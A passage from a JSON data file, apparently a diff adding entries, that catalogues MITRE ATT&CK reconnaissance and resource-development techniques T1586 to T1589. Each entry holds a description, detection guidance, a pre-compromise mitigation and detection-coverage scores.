Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).", + "url": "https://attack.mitre.org/techniques/T1586", + "tactics": [ + "Resource Development" + ], + "detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", + "platforms": [ + "PRE" + ], + "data_sources": [ + "Network Traffic: Network Traffic Content", + "Persona: Social Media" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1586.001", + "name": "Compromise Accounts: Social Media Accounts", + "url": "https://attack.mitre.org/techniques/T1586/001", + "description": "Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).", + "detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1586.002", + "name": "Compromise Accounts: Email Accounts", + "url": "https://attack.mitre.org/techniques/T1586/002", + "description": "Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).\n\nA variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nAdversaries can use a compromised email account to hijack existing email threads with targets of interest.", + "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "cumulative_score": 0.0599, + "adjusted_score": 0.0599, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": false, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1587", + "name": "Develop Capabilities", + "description": "Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)\n\nAs with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.", + "url": "https://attack.mitre.org/techniques/T1587", + "tactics": [ + "Resource Development" + ], + "detection": "Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.\n\nConsider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.", + "platforms": [ + "PRE" + ], + "data_sources": [ + "Internet Scan: Response Content", + "Malware Repository: Malware Content", + "Malware Repository: Malware Metadata" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1587.001", + "name": "Develop Capabilities: Malware", + "url": "https://attack.mitre.org/techniques/T1587/001", + "description": "Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)\n\nAs with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.\n\nSome aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)", + "detection": "Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1587.002", + "name": "Develop Capabilities: Code Signing Certificates", + "url": "https://attack.mitre.org/techniques/T1587/002", + "description": "Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.\n\nPrior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code signing certificates for use in operations.", + "detection": "Consider analyzing self-signed code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, and common name. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in crafting self-signed code signing certificates.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1587.003", + "name": "Develop Capabilities: Digital Certificates", + "url": "https://attack.mitre.org/techniques/T1587/003", + "description": "Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).\n\nAdversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)).\n\nAfter creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.", + "detection": "Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)\n\nDetection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1587.004", + "name": "Develop Capabilities: Exploits", + "url": "https://attack.mitre.org/techniques/T1587/004", + "description": "Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)\n\nAs with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", + "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "cumulative_score": 0.09761904761904762, + "adjusted_score": 0.09761904761904762, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": false, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1588", + "name": "Obtain Capabilities", + "description": "Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.\n\nIn addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab)\n\nIn addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)", + "url": "https://attack.mitre.org/techniques/T1588", + "tactics": [ + "Resource Development" + ], + "detection": "Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)\n\nConsider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.", + "platforms": [ + "PRE" + ], + "data_sources": [ + "Certificate: Certificate Registration", + "Internet Scan: Response Content", + "Malware Repository: Malware Content", + "Malware Repository: Malware Metadata" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1588.001", + "name": "Obtain Capabilities: Malware", + "url": "https://attack.mitre.org/techniques/T1588/001", + "description": "Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.\n\nIn addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).", + "detection": "Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific MaaS offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1588.002", + "name": "Obtain Capabilities: Tool", + "url": "https://attack.mitre.org/techniques/T1588/002", + "description": "Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)\n\nAdversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).", + "detection": "In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1588.003", + "name": "Obtain Capabilities: Code Signing Certificates", + "url": "https://attack.mitre.org/techniques/T1588/003", + "description": "Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.\n\nPrior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.", + "detection": "Consider analyzing code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, common name, and certificate authority. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in procuring code signing certificates.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1588.004", + "name": "Obtain Capabilities: Digital Certificates", + "url": "https://attack.mitre.org/techniques/T1588/004", + "description": "Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.\n\nAdversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.\n\nCertificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)\n\nAfter obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.", + "detection": "Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)\n\nDetection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1588.005", + "name": "Obtain Capabilities: Exploits", + "url": "https://attack.mitre.org/techniques/T1588/005", + "description": "Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)\n\nIn addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)\n\nAn adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", + "detection": "\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1588.006", + "name": "Obtain Capabilities: Vulnerabilities", + "url": "https://attack.mitre.org/techniques/T1588/006", + "description": "Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)\n\nAn adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)).", + "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the potential use of exploits for vulnerabilities (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "cumulative_score": 0.05476190476190476, + "adjusted_score": 0.05476190476190476, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": false, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1589", + "name": "Gather Victim Identity Information", + "description": "Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", + "url": "https://attack.mitre.org/techniques/T1589", + "tactics": [ + "Reconnaissance" + ], + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "platforms": [ + "PRE" + ], + "data_sources": [], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1589.001", + "name": "Gather Victim Identity Information: Credentials", + "url": "https://attack.mitre.org/techniques/T1589/001", + "description": "Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nAdversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote 